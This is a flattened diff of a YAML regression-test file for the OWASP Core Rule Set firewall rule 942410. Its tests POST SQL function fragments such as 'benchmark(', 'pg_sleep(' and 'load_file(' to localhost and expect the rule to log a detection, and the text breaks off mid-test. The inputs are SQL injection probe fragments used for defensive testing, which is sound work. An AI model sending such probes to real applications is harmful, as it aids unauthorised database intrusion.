"SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-54 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-59 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-64 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=md5%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-65 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=MID%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-66 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=minute+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-67 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=month%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-68 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "name_const(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-69 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "now(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-70 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "nOW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-71 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "ord(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-72 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "password?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-73 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "password/?(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-74 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Password>$(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-75 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pg_sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-76 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pi(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-77 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "PI(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-78 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pow(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-79 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "POW(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-80 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "quarter. (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-81 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "rand(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-82 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "Rand (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-83 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "RAND(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-84 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "replace(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-85 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "REPLACE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-86 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "round (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-87 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "round(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-88 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "rtrim(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-89 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "RTRIM(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-90 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sin (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-91 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SIN(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-92 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sleep(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-93 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SLEEP (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-94 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=strcmp(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-95 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=substr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-96 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SUBSTR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-97 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=substring(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-98 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "SUBSTRING(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-99 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sysdate(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-100 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "time (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-101 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=time%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-102 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=trim%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-103 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=Uncompress+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-104 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=unhex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-105 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=uNhEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-106 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=updatexml%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-107 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=UpdateXML%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-108 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=UPPER%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-109 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=user+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-110 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=user%2F%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-111 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=user%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-112 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=values+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-113 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=VALUES%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-114 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=version%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-115 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=version%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-116 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=xmltype%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-117 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=XMLType%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - - test_title: 942410-118 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=year%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942410.yaml +tests: + - test_title: 942410-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ABS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "benchmark(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cast(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CAST(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "char(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "chaR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "chr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CHR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COALESCE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Compress (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "concat (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "concat_ws(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "convert(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COUNT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "database (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "date(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 